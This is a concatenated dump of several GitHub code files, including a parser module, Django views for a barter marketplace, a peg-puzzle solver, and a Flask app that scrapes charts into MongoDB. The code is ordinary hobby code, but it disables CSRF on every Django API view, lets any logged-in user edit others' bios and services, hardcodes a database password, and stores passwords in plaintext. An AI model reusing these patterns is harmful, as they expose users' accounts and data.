arc_between:\n gold = 1\n arc_between = True\n else:\n gold = 0\n\n self.gold_parts.append(gold)\n part = NextSibling(h, m, s)\n parts.append(part)\n\n self.part_lists[Target.NEXT_SIBLINGS] = parts\n\n def make_grandsiblings(self, instance):\n \"\"\"\n Create the parts relative to grandsibling nodes.\n\n Each part means that arcs g -> h, h -> m, and h ->s exist at the same\n time.\n :type instance: DependencyInstanceNumeric\n \"\"\"\n parts = []\n for g in range(len(instance)):\n for h in range(1, len(instance)):\n if g == h:\n continue\n\n if not self.arc_mask[g, h]:\n # pruned\n continue\n\n gold_gh = instance.get_head(h) == g\n\n # check modifiers to the right\n for m in range(h, len(instance)):\n if h != m and not self.arc_mask[h, m]:\n # pruned; h == m signals first child\n continue\n\n gold_hm = m == h or instance.get_head(m) == h\n arc_between = False\n\n for s in range(m + 1, len(instance) + 1):\n if s < len(instance) and not self.arc_mask[h, s]:\n # pruned; s == len signals last child\n continue\n\n gold_hs = s == len(instance) or \\\n instance.get_head(s) == h\n\n if self.make_gold:\n gold = 0\n if gold_hm and gold_hs and not arc_between:\n if gold_gh:\n gold = 1\n\n arc_between = True\n self.gold_parts.append(gold)\n\n part = GrandSibling(h, m, g, s)\n parts.append(part)\n\n # check modifiers to the left\n for m in range(h, 0, -1):\n if h != m and not self.arc_mask[h, m]:\n # pruned; h == m signals last child\n continue\n\n gold_hm = m == h or instance.get_head(m) == h\n arc_between = False\n\n for s in range(m - 1, -2, -1):\n if s != -1 and not self.arc_mask[h, s]:\n # pruned out\n # s = -1 signals leftmost child\n continue\n\n gold_hs = s == -1 or instance.get_head(s) == h\n if self.make_gold:\n gold = 0\n if gold_hm and gold_hs and not arc_between:\n if gold_gh:\n gold = 1\n\n arc_between = True\n self.gold_parts.append(gold)\n\n part = GrandSibling(h, m, g, s)\n parts.append(part)\n\n self.part_lists[Target.GRANDSIBLINGS] = parts\n\n def get_margin(self):\n \"\"\"\n Compute and return a margin vector to be used in the loss and a\n normalization term to be added to it.\n\n It only affects Arcs or LabeledArcs (in case the latter are used).\n\n :return: a margin array to be added to the model scores and a\n normalization constant. The vector is as long as the number of\n parts.\n \"\"\"\n # TODO: avoid repeated code with dependency_decoder\n p = np.zeros(len(self), dtype=np.float)\n\n # place the margin on LabeledArcs scores\n # their offset in the gold vector is immediately after Arcs\n offset = self.offsets[Target.RELATIONS]\n num_parts = self.num_labeled_arcs\n\n gold_values = self.gold_parts[offset:offset + num_parts]\n p[offset:offset + num_parts] = 0.5 - gold_values\n q = 0.5 * gold_values.sum()\n\n return p, q\n\n def create_arc_index(self):\n \"\"\"\n Create a matrix such that cell (h, m) has the position of the given arc\n in the arc list of -1 if it doesn't exist.\n\n The matrix shape is (n, n), where n includes the dummy root.\n \"\"\"\n mask = self.arc_mask.astype(np.int)\n\n # replace 1's and 0's with their positions\n mask[mask == 0] = -1\n mask[mask == 1] = np.arange(np.sum(mask == 1))\n\n return mask\n\n def get_arc_indices(self):\n \"\"\"\n Return a tuple with indices for heads and modifiers of valid arcs, such\n that they are ordered first by head and then by modifier.\n\n Modifier words are numbered from 1; 0 is reserved for the root.\n\n This ensures that all conversions from arc_mask to arcs will have the\n same ordering.\n\n :return: a tuple (heads, modifiers)\n \"\"\"\n head_indices, modifier_indices = np.where(self.arc_mask)\n\n return head_indices, modifier_indices\n\n def has_type(self, type_):\n \"\"\"\n Return whether this object stores parts of a particular type.\n\n :param type_: a class such as NextSibling or\n Grandparent\n :return: boolean\n \"\"\"\n return type_ in self.part_lists and len(self.part_lists[type_]) > 0\n\n def __len__(self):\n return self.num_parts\n\n def get_num_type(self, type_):\n \"\"\"\n Return the number of parts of the given type\n \"\"\"\n if type_ not in self.part_lists:\n return 0\n return len(self.part_lists[type_])\n\n def get_type_offset(self, type_):\n \"\"\"\n Return the offset of the given type in the ordered array with gold data.\n \"\"\"\n if type_ == Target.HEADS:\n return 0\n\n if type_ == Target.RELATIONS:\n return self.num_arcs\n\n if type_ not in self.part_lists:\n return -1\n\n offset = self.num_arcs + self.num_labeled_arcs\n for type_i in self.part_lists:\n if type_i == type_:\n return offset\n else:\n offset += len(self.part_lists[type_i])\n\n def get_gold_output(self):\n \"\"\"\n Return a single list with all gold values, in the order that parts were\n added.\n\n If first Arc parts were added, then some Sibling, then more Arcs, the\n gold list will have all Arcs and then all Siblings.\n\n :return: a list if any output exists, None otherwise\n \"\"\"\n all_gold = []\n for type_ in self.part_gold:\n all_gold.extend(self.part_gold[type_])\n\n if len(all_gold) == 0:\n return None\n\n return all_gold\n","repo_name":"deep-spin/pyturbo","sub_path":"turboparser/parser/dependency_parts.py","file_name":"dependency_parts.py","file_ext":"py","file_size_in_byte":19221,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"40724376690","text":"import json\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.db import IntegrityError\nfrom django.db.models import Avg\nfrom django.http import JsonResponse\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .models import User, Category, Service, Purchase, Rating, Comment, Reply\n\n\n\n\"\"\" renders the index if the user is not logged in, or the 'explore' page if he is \"\"\"\ndef index(request):\n\n # If the user is logged in, redirect to the \"explore\" page\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse(\"explore\"))\n\n # Else, show the index page\n else:\n return render(request, \"barter/index.html\")\n \n\n\n\"\"\" renders the page \"explore\" of the app \"\"\"\n@login_required\ndef explore(request):\n\n # get all the active services from the db\n services = Service.objects.filter(status=True).order_by('name')\n\n # get the catogories for the filter option\n categories = Category.objects.all().order_by('category')\n\n # get the info of the user\n userinfo = User.objects.get(username=request.user)\n\n # get the info of the user's purchases\n purchases = Purchase.objects.filter(user_id=userinfo)\n\n # create a list of the IDs of the services purchased by the user to be able to render the buy/bought button correctly\n purchases_list = []\n for purchase in purchases:\n purchases_list.append(purchase.service_id.id)\n\n # get the user's services (for the left column)\n user_services = Service.objects.filter(user_id=userinfo, status=True).count()\n\n # get the watchlist of the user\n watchlist = userinfo.watchedby.all().order_by('name')\n\n\n # render the template\n return render(request, \"barter/explore.html\", {\n \"services\": services,\n \"categories\": categories,\n \"userinfo\": userinfo,\n \"purchases\": purchases,\n \"purchases_list\": purchases_list,\n \"user_services\": user_services,\n \"watchlist\": watchlist\n })\n\n\n\n\"\"\" Renders the profile of a user \"\"\"\n@login_required\ndef profile(request, user):\n \n # get the info of the user whose profile is to be shown:\n profiler = User.objects.get(username=user)\n\n # get the services of the profiler\n services = Service.objects.filter(user_id=profiler).order_by('name')\n\n # get the watchlist of the profiler\n profiler_watchlist = profiler.watchedby.all().order_by('name')\n\n # get the purchases of the profiler\n profiler_purchases = Purchase.objects.filter(user_id=profiler)\n\n # get the purchases made to the profiler (those who have bought his services)\n profiler_sellings = Purchase.objects.filter(service_id__in=services).order_by(\"-timestamp\")\n\n # get the comments on the profiler\n comments = Comment.objects.filter(profile=profiler).order_by(\"-id\")\n\n # get the replies (if any) to the comments\n if comments:\n replies = Reply.objects.filter(comment_id__in=comments)\n else:\n replies = False\n\n # get the ratings of the profiler\n ratings = Rating.objects.filter(profile=profiler)\n\n # make a list with the users that have already voted\n ratings_list = []\n for rating in ratings:\n ratings_list.append(rating.user_id)\n\n # get the average of the ratings\n ratings_avg = Rating.objects.filter(profile=profiler).aggregate(Avg('rating'))\n\n # get the purchases of the user seeing this profile\n purchases = Purchase.objects.filter(user_id=request.user)\n\n # create a list of the IDs of the services purchased by the user to be able to render the buy/bought button correctly\n purchases_list = []\n for purchase in purchases:\n purchases_list.append(purchase.service_id.id)\n\n # check if the user has ever bought something from the profiler\n buyer = False\n for purchase in purchases:\n for service in services:\n if service.id == purchase.service_id.id:\n buyer = True\n\n # get the categories for the edit-service form\n categories = Category.objects.all().order_by(\"category\")\n\n\n # render the template\n return render(request, \"barter/profile.html\", {\n \"profiler\": profiler,\n \"services\": services,\n \"profiler_purchases\": profiler_purchases,\n \"profiler_sellings\": profiler_sellings,\n \"comments\": comments,\n \"replies\": replies,\n \"profiler_watchlist\": profiler_watchlist,\n \"purchases_list\": purchases_list,\n \"ratings\": ratings,\n \"ratings_list\": ratings_list,\n \"ratings_avg\": ratings_avg,\n \"categories\": categories,\n \"buyer\": buyer,\n \"range\": range(1,11)\n })\n\n\n\n\"\"\" Handles a user voting on another user's profile\"\"\"\n@login_required\n@csrf_exempt\ndef voting(request, profiler):\n \n # get the info of the user\n userinfo = User.objects.get(username=request.user)\n\n # get the info of the profiler\n profile = User.objects.get(username=profiler)\n\n if request.method == \"PUT\":\n data = json.loads(request.body)\n\n # if to create a new row in Rating\n if data[\"type\"] == 'newvote':\n try:\n newvote = Rating(user_id=userinfo, profile=profile, rating=data[\"rating\"])\n newvote.save()\n\n return JsonResponse({\"message\": \"Vote created\"}, status=202)\n\n except:\n JsonResponse({\"error\": \"Could not create new vote\"}, status=404)\n\n # else, to update an existing vote in Rating\n else:\n try:\n # retrieve the existing vote from Rating and assign the new rating\n currentvote = Rating.objects.get(user_id=userinfo, profile=profile)\n currentvote.rating = data[\"rating\"]\n currentvote.save()\n\n return JsonResponse({\"message\": \"Vote\"}, status=202)\n\n except:\n JsonResponse({\"error\": \"Could not update vote\"}, status=404)\n\n # Post must be via GET or PUT\n else:\n return JsonResponse({\n \"error\": \"GET or PUT request required.\"\n }, status=400)\n\n\n\n\"\"\" adds or removes services from a user's watchlist \"\"\"\n@login_required\n@csrf_exempt\ndef managelist(request, service_id):\n\n # get the info of the user\n userinfo = User.objects.get(username=request.user)\n\n # get the service\n service = Service.objects.get(pk=service_id)\n\n # Update when the user adds/removes a service from their list\n if request.method == \"PUT\":\n data = json.loads(request.body)\n\n # if the user has the service on their list, remove it\n if data[\"inlist\"]:\n try:\n service.watchedby.remove(userinfo)\n except:\n JsonResponse({\"error\": \"Record not found\"}, status=404)\n\n # else, add that the user to the \"watchedby\" column of the service\n else:\n try:\n service.watchedby.add(userinfo)\n except:\n JsonResponse({\"error\": \"Record not found\"}, status=404)\n\n return HttpResponse(status=204)\n\n # Post must be via GET or PUT\n else:\n return JsonResponse({\n \"error\": \"GET or PUT request required.\"\n }, status=400)\n\n\n\n\"\"\" handles a user buying a service \"\"\"\n@login_required\n@csrf_exempt\ndef buy(request, service_id):\n\n # get the info of the user\n userinfo = User.objects.get(username=request.user)\n\n # get the service\n service = Service.objects.get(pk=service_id)\n\n # get the user who offers this service\n profiler = User.objects.get(username=service.user_id)\n\n # Attempt to buy this service for this user\n if request.method == \"PUT\":\n data = json.loads(request.body)\n\n if data[\"buy\"]:\n try:\n # check that the user has enough points to buy the service\n if userinfo.points < service.price:\n return JsonResponse({\"message\": \"Not enough points\"}, status=201)\n else:\n # update the user's points after the purchase\n updatedpoints = int(userinfo.points - service.price)\n userinfo.points = updatedpoints\n userinfo.save()\n\n # update the points of the user who offers the service\n profilernewpoints = int(profiler.points + service.price)\n profiler.points = profilernewpoints\n profiler.save()\n\n # when updating the service's remaining slots, if they are now 0, set the service's status to false (inactive)\n updatedslots = int(service.slots - 1)\n service.slots = updatedslots\n if service.slots == 0:\n service.status = False\n service.save()\n\n # update the model Purchase\n newpurchase = Purchase(user_id=userinfo , service_id=service , amountpaid=service.price)\n newpurchase.save()\n\n return JsonResponse({\"message\": \"Purchase ok\"}, status=202)\n\n except:\n return JsonResponse({\"error\": \"Record not found\"}, status=404)\n\n else:\n return JsonResponse({\"error\": \"Record not found\"}, status=404)\n\n return HttpResponse(status=204)\n\n # Post must be via GET or PUT\n else:\n return JsonResponse({\n \"error\": \"GET or PUT request required.\"\n }, status=400)\n\n\n\n\"\"\" handles a user closing or re-opening one of their services \"\"\"\n@login_required\n@csrf_exempt\ndef opencloseservice(request, service_id):\n\n # get the info of the user\n userinfo = User.objects.get(username=request.user)\n\n # get the service\n service = Service.objects.get(pk=service_id)\n\n # Attempt to buy this service for this user\n if request.method == \"PUT\":\n data = json.loads(request.body)\n\n if data[\"status\"]:\n try:\n if userinfo != service.user_id:\n return JsonResponse({\"error\": \"You're not the poster of this service\"}, status=201)\n\n else:\n service.status = False\n service.save()\n return JsonResponse({\"message\": \"Closing ok\"}, status=202)\n\n except:\n return JsonResponse({\"error\": \"Record not found\"}, status=404)\n\n else:\n try:\n if userinfo != service.user_id:\n return JsonResponse({\"error\": \"You're not the poster of this service\"}, status=201)\n\n else:\n if service.slots == 0:\n return JsonResponse({\"message\": \"0 slots\"}, status=203)\n else:\n service.status = True\n service.save()\n return JsonResponse({\"message\": \"Opening ok\"}, status=202)\n\n except:\n return JsonResponse({\"error\": \"Record not found\"}, status=404)\n\n\n\n\"\"\" When a user wants to edit their bio. If by GET, then the bio is returned to be loaded on the textarea\nso the user can edit it \"\"\"\n@login_required\n@csrf_exempt\ndef editbio(request, user):\n\n # Query for requested bio\n try:\n userinfo = User.objects.get(username=user)\n except User.DoesNotExist:\n return JsonResponse({\"error\": \"User not found.\"}, status=404)\n\n # Return bio contents\n if request.method == \"GET\":\n return JsonResponse(userinfo.serialize())\n\n # Update when the bio is edited\n elif request.method == \"PUT\":\n data = json.loads(request.body)\n userinfo.bio = data[\"bio\"]\n userinfo.save()\n return HttpResponse(status=204)\n\n # Post must be via GET or PUT\n else:\n return JsonResponse({\n \"error\": \"GET or PUT request required.\"\n }, status=400)\n\n\n\n\"\"\" When a user wants to edit one of their services \"\"\"\n@login_required\n@csrf_exempt\ndef editservice(request, service_id):\n \n # Query for requested service\n try:\n service = Service.objects.get(pk=service_id)\n except Service.DoesNotExist:\n return JsonResponse({\"error\": \"Service not found.\"}, status=404)\n\n # Return service current details\n if request.method == \"GET\":\n return JsonResponse(service.serialize())\n\n # Update when the service is edited\n elif request.method == \"PUT\":\n data = json.loads(request.body)\n service.name = data[\"servicename\"]\n service.description = data[\"servicedescription\"]\n service.price = data[\"serviceprice\"]\n service.slots = data[\"serviceslots\"]\n\n # convert the category to an instance of Category\n newcategory = Category.objects.get(category=data[\"servicecategory\"])\n service.category = newcategory\n\n service.save()\n \n return HttpResponse(status=204)\n\n # Post must be via GET or PUT\n else:\n return JsonResponse({\n \"error\": \"GET or PUT request required.\"\n }, status=400)\n\n\n\n\"\"\" add comments to a profile \"\"\"\n@login_required\n@csrf_exempt\ndef newcomment(request):\n\n # Composing a new comment must be via POST\n if request.method != \"POST\":\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\n\n # Get content of comment\n data = json.loads(request.body)\n comment = data.get(\"comment\", \"\")\n profileraw = data.get(\"profile\", \"\")\n\n profile = User.objects.get(username=profileraw)\n\n # Save the new comment\n newcomment = Comment(\n user_id=request.user,\n profile=profile,\n comment=comment,\n )\n newcomment.save()\n\n return JsonResponse({\"message\": \"New comment added successfully.\"}, status=201)\n\n\n\n\"\"\" When a user wants to create a new service \"\"\"\n@login_required\n@csrf_exempt\ndef newservice(request):\n\n # Creating a new service must be via POST\n if request.method != \"POST\":\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\n\n # Get content of comment\n data = json.loads(request.body)\n name = data.get(\"name\", \"\")\n description = data.get(\"description\", \"\")\n price = data.get(\"price\", \"\")\n slots = data.get(\"slots\", \"\")\n categoryraw = data.get(\"category\", \"\")\n\n # convert the category to an instance of Category\n category = Category.objects.get(category=categoryraw)\n\n # Save the new service\n newservice = Service(\n user_id=request.user,\n name=name,\n description=description,\n price=price,\n slots=slots,\n category=category\n )\n newservice.save()\n\n return JsonResponse({\"message\": \"New service created successfully.\"}, status=201)\n\n\n\n\"\"\" Handles a reply to a comment \"\"\"\n@login_required\n@csrf_exempt\ndef reply(request):\n\n # Composing a reply must be via POST\n if request.method != \"POST\":\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\n\n # Get details of the reply\n data = json.loads(request.body)\n reply = data.get(\"reply\", \"\")\n comment_id_raw = data.get(\"comment_id\", \"\")\n comment_id = Comment.objects.get(pk=comment_id_raw)\n \n # Save the new reply\n newreply = Reply(\n user_id=request.user,\n comment_id=comment_id,\n reply=reply\n )\n newreply.save()\n\n return JsonResponse({\"message\": \"New reply added successfully.\"}, status=201)\n\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"barter/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"barter/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"barter/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"barter/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"barter/register.html\")","repo_name":"roigle/capstone","sub_path":"barter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36415012834","text":"class PuzzlePegs:\n \"\"\"Solves the 15-peg triangular board game\"\"\"\n\n def __init__(self, start_pos: int, end_pos: int):\n \"\"\"Create a puzzle with a starting hole and ending peg location specified\"\"\" # pylint: disable=line-too-long\n # Starting hole location\n self._start_pos: int = start_pos\n\n # Ending peg location\n self._end_pos: int = end_pos\n\n # History of boards representing the jumps\n self._boards: list[list[str]] = []\n\n # History of jumps\n self._jumps: list[str] = []\n\n # Universal representation of a peg\n self._PEG: str = \"P\" # pylint: disable=invalid-name\n\n # Universal representation of a hole\n self._HOLE: str = \"H\" # pylint: disable=invalid-name\n\n # Universal table of moves\n # This is only valid for 14-hole boards of trangular shape\n self._MOVES: list[list[int]] = [ # pylint: disable=invalid-name\n [1, 2, 4],\n [1, 3, 6],\n [2, 4, 7],\n [2, 5, 9],\n [3, 5, 8],\n [3, 6, 10],\n [4, 2, 1],\n [4, 5, 6],\n [4, 7, 11],\n [4, 8, 13],\n [5, 8, 12],\n [5, 9, 14],\n [6, 3, 1],\n [6, 5, 4],\n [6, 9, 13],\n [6, 10, 15],\n [7, 4, 2],\n [7, 8, 9],\n [8, 5, 3],\n [8, 9, 10],\n [9, 5, 2],\n [9, 8, 7],\n [10, 6, 3],\n [10, 9, 8],\n [11, 7, 4],\n [11, 12, 13],\n [12, 8, 5],\n [12, 13, 14],\n [13, 12, 11],\n [13, 8, 4],\n [13, 9, 6],\n [13, 14, 15],\n [14, 13, 12],\n [14, 9, 5],\n [15, 10, 6],\n [15, 14, 13],\n ]\n\n @staticmethod\n def help():\n \"\"\"Print help information\"\"\"\n print(\"Usage: PuzzlePegs(start_pos, end_pos)\")\n print(\"start_pos: the location of the starting hole in the board, e.g. 13\")\n print(\"end_pos: the location of the last peg, e.g. 13\")\n\n @staticmethod\n def _print_board(board: list[str]) -> None:\n \"\"\"Print the game board in ASCII form\"\"\"\n string = \"\"\n string += f\" {board[1]}\\n\"\n string += f\" {board[2]} {board[3]}\\n\"\n string += f\" {board[4]} {board[5]} {board[6]}\\n\"\n string += f\" {board[7]} {board[8]} {board[9]} {board[10]}\\n\"\n string += f\"{board[11]} {board[12]} {board[13]} {board[14]} {board[15]}\"\n print(string)\n\n def solve(self):\n \"\"\"Solve the puzzle\"\"\"\n # Build the board. Reserve 16 spaces.\n board: list[str] = []\n board.insert(0, \" \") # Null \"space\", this space is not used\n for i in range(1, 16, 1):\n if self._start_pos == i:\n board.insert(i, self._HOLE)\n else:\n board.insert(i, self._PEG)\n\n # Store the initial board to show before the moves are printed\n original = board.copy()\n\n # Now, solve the puzzle!\n if self._solve(board):\n print(\"Initial board\")\n self._print_board(original)\n\n # Print the moves and board to the output. The moves are in reverse order due to the\n # recursion. The board states are not.\n self._jumps.reverse()\n for (jump, board) in zip(self._jumps, self._boards):\n print(jump)\n self._print_board(board)\n\n else:\n print(\"No solution could be found for this combination\")\n\n def _solve(self, board: list[str]) -> bool:\n \"\"\"Internal recursive function for solving, making use of backtracking\"\"\"\n # For every move in the table of possible moves...\n for move in self._MOVES:\n # See if we can match a PPH pattern. If we can, try following this route by calling\n # ourselves again with this modified board\n if (\n (board[move[0]] == self._PEG) and (board[move[1]] == self._PEG) and (board[move[2]] == self._HOLE)\n ): # pylint: disable=line-too-long\n # Apply the move\n board[move[0]] = self._HOLE\n board[move[1]] = self._HOLE\n board[move[2]] = self._PEG\n\n # Record the board in history of boards\n clone = board.copy()\n self._boards.append(clone)\n\n # Call ourselves recursively. If we return true then the conclusion was good. If it\n # was false, we hit a dead end and we should not print the move\n if self._solve(board):\n # Record the jump\n self._jumps.append(f\"Moved {move[0]} to {move[2]}, jumping over {move[1]}\")\n return True\n\n # If we end up here, undo the move and try the next one\n self._boards.pop()\n board[move[0]] = self._PEG\n board[move[1]] = self._PEG\n board[move[2]] = self._HOLE\n\n # If no pattern is matched, see if there is only one peg left and see if it is in the\n # right spot\n # Situation 1: count of PEG is 1 and the ending position was not specified\n peg_count: int = board.count(self._PEG)\n if peg_count == 1 and self._end_pos == -1:\n return True\n # Count of 'P' is 1 and the value at the ending position is 'P'\n elif peg_count == 1 and board[self._end_pos] == self._PEG:\n return True\n # Count of 'P' was not 1 or the value at the ending position was not 'P'\n else:\n return False\n","repo_name":"Techman/puzzle-pegs-py","sub_path":"puzzle_pegs.py","file_name":"puzzle_pegs.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2848724773","text":"from .models import Students, TestSet\nimport cv2\nimport numpy as np\nimport urllib\nimport json\n\ndef save_details(data, img, setId):\n\n enrollmentno = data['enrollment']\n test_id = data['test_id']\n score = data['score']\n answerKey = data['response']\n answerKey = json.dumps(answerKey)\n rs = Students.objects.filter(setId = setId).filter(enrollment= enrollmentno)\n if rs.exists():\n Students.objects.filter(enrollment= enrollmentno).delete()\n user = Students(enrollment = enrollmentno, testId =test_id, score = score, answerKey= answerKey,answerSheet = img,setId=setId) \n user.save()\n\ndef getStudentList(setId):\n rs = Students.objects.filter(setId= setId)\n student_list = []\n for record in rs:\n details = {}\n details['score'] = record.score\n details['enrollment'] = record.enrollment\n details['test_id'] = record.testId\n details['answer_sheet_img'] = record.answerSheet.url\n student_list.append(details)\n\n return student_list \n \ndef file_to_img(file):\n arr = np.asarray(bytearray(file.read()), dtype=np.uint8)\n imag = cv2.imdecode(arr, 1)\n return imag\n\ndef getAnswerKey(setId):\n \n t = TestSet.objects.filter(setId= setId)\n if t.exists():\n answerKey = t[0].answerKey\n print(type(answerKey))\n result = {\n 'data' : answerKey,\n 'correctMarks' : t[0].correctMarks,\n 'negative': t[0].negativeMarks,\n 'status': 200\n }\n return result\n \n return {\n 'status' : 404,\n 'message' : 'No Answer Key Found'\n }","repo_name":"vishnu0179/OMR-Reader","sub_path":"omr/user_scripts.py","file_name":"user_scripts.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8004206607","text":"\"\"\"src/domain/services/repository.py\"\"\"\n\nfrom typing import Any, AsyncGenerator\n\nfrom src.domain.services import Service, ServiceUncommited\nfrom src.infrastructure.database import BaseRepository, ServiceTable\n\n__all__ = (\"ServiceRepository\",)\n\n\nclass ServiceRepository(BaseRepository[ServiceTable]):\n schema_class = ServiceTable\n\n async def all(self) -> AsyncGenerator[Service, None]:\n async for instance in self._all():\n yield Service.from_orm(instance)\n\n async def get(self, key_: int, value_: Any) -> Service:\n instance = await self._get(key=key_, value=value_)\n return Service.from_orm(instance)\n\n async def create(self, schema: ServiceUncommited) -> Service:\n instance: ServiceTable = await self._save(schema.dict())\n return Service.from_orm(instance)\n\n async def update(\n self, key_: str, value_: Any, payload_: dict[str, Any]\n ) -> Service:\n instance: ServiceTable = await self._update(\n key=key_, value=value_, payload=payload_\n )\n return Service.from_orm(instance)\n","repo_name":"Rostyslav-Coder/FastAPI_Beauty_Shop","sub_path":"src/domain/services/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27401110663","text":"from flask import Flask, render_template, request, jsonify\n\napp = Flask(__name__)\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom pymongo import MongoClient\nimport certifi\n\nca = certifi.where()\n\nclient = MongoClient('mongodb+srv://test:sparta@cluster0.zhropba.mongodb.net/Cluster0?retryWrites=true&w=majority',\n tlsCAFile=ca)\ndb = client.dbsparta\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\ndata = requests.get('http://ticket.interpark.com/contents/Ranking/RankList?pKind=01011&pCate=&pType=W&pDate=20230206',\n headers=headers)\n\nsoup = BeautifulSoup(data.text, 'html.parser')\n\n# 크롤링 데이터 (인터파크 뮤지컬 정보)\nmusicals = soup.select('body > div.rankingDetailBody > div')\nfor musical_cul in musicals:\n title = musical_cul.select_one('td.prds > div.prdInfo > a > b')\n if title is not None: # 제목에 None값이 있으면 출력이 정상적으로 안됨\n name = title.text\n image = musical_cul.select_one('td.prds > a > img')['src'] # 이미지가 alt , src가 잡히는데 alt는 NO_image여서 src의 데이터를 가져옴\n content = musical_cul.select_one('td.prdDuration').text.strip() # 공백제거를 위한 .strip()내장함수 사용\n # print(name, image, content)\n # doc = { #계속 데이터가 삽입되는 것을 방지하고자 주석처리.\n # 'category': '뮤지컬',\n # 'image': image,\n # 'name': name,\n # 'content': content,\n # }\n # db.musical.insert_one(doc) #데이터 삽입.\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\ndata = requests.get('https://www.genie.co.kr/chart/top200?ditc=M&rtm=N&ymd=20210701', headers=headers)\n\nsoup = BeautifulSoup(data.text, 'html.parser')\n\ngenies = soup.select('#body-content > div.newest-list > div > table > tbody > tr')\nfor genie in genies:\n music = genie.select_one('td.number').text[0:2]\n image = genie.select_one('td:nth-child(3) > a > img')['src']\n name = genie.select_one('td.info > a.title.ellipsis').text.strip()\n artist = genie.select_one('td.info > a.artist.ellipsis').text\n content = genie.select_one('td.info > a.albumtitle.ellipsis').text\n\n doc = {\n 'category': 'category',\n 'image': image,\n 'name': name,\n 'content': content,\n 'artist': artist,\n }\n # db.music.insert_one(doc)\n@app.route(\"/music_List\", methods=[\"GET\"])\ndef movie_get():\n music_list = list(db.music.find({}, {'_id': False}))\n return jsonify({'musics':music_list})\n\n# 송 수신\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/movie_List')\ndef movie_List():\n return render_template('movie_List.html')\n\n@app.route('/book_List')\ndef book_List():\n return render_template('book_List.html')\n\n@app.route('/music_List')\ndef music_List():\n return render_template('music_List.html')\n\n@app.route('/books')\ndef books():\n return render_template('book_List.html')\n\n@app.route('/musical_List')\ndef musical_List():\n return render_template('musical_List.html')\n\n@app.route('/login')\ndef login():\n return render_template('login.html')\n\n@app.route('/join')\ndef join():\n return render_template('join.html')\n\n@app.route('/board')\ndef board():\n return render_template('board.html')\n\n@app.route('/join', methods=['GET'])\ndef test_get():\n title_receive = request.args.get('title_give')\n print(title_receive)\n return jsonify({'result': 'success', 'msg': '이 요청은 GET!'})\n\n@app.route(\"/join\", methods=[\"POST\"])\ndef join_post():\n userId_receive = request.form['userId_give']\n userPw_receive = request.form['userPw_give']\n userName_receive = request.form['userName_give']\n userPhone_receive = request.form['userPhone_give']\n # if userId_receive == '' or userPw_receive == '' or name_receive == '' or phone_receive == '':\n # return jsonify({'msg': '정보를 입력해주세요.'})\n doc = {\n 'userId': userId_receive,\n 'userPw': userPw_receive,\n 'userName': userName_receive,\n 'userPhone': userPhone_receive,\n }\n db.member.insert_one(doc)\n\n return jsonify({'msg':'회원가입 완료'})\n\n@app.route(\"/book\", methods=[\"GET\"])\ndef book_get():\n book_list = list(db.books.find({}, {'_id': False}))\n return jsonify({'books': book_list})\n\n#board\n@app.route(\"/board\", methods=[\"POST\"])\ndef board_post():\n writer_receive = request.form[\"writer_give\"]\n comment_receive = request.form[\"comment_give\"]\n date_receive = request.form[\"date_give\"]\n\n doc = {\n 'writer': writer_receive,\n 'comment': comment_receive,\n 'date': date_receive\n }\n\n db.board.insert_one(doc)\n return jsonify({'msg':'한줄평 작성 완료!'})\n\n@app.route(\"/boards\", methods=[\"GET\"])\ndef board_get():\n board_list = list(db.board.find({},{'_id':False}))\n return jsonify({'board_list':board_list})\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=5000, debug=True)\n","repo_name":"rhdqors/toy-project","sub_path":"prac.py","file_name":"prac.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35224203693","text":"from MultiHex2.tools.basic_tool import Basic_Tool\nfrom MultiHex2.widgets.widgets import RegionWidget\nfrom MultiHex2.core import Region, screen_to_hex, Hex\nfrom MultiHex2.core.core import County\nfrom 